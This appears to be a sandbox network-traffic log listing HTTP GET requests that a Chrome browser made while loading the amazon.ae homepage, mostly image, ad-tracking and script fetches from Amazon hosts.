    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DAPAVCQJMFK78QJEV1PMZ:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1724264922.216,%22ttv%22:1724264922.216%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/414Wkl-jqYL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY304_CB567277961_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Toys_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41daFqDf-bL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/317JiGToz-L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41iU2dw4mWL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41qWHXXnEKL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/3153Pv75-uS._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31qszhAmmGL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31eMENCjajL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 10sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/I/31R49MniA9L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 10sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31ihwTsvbBL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41iXOCSvWNL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619DPgbhX5L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61kj0CBNocL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
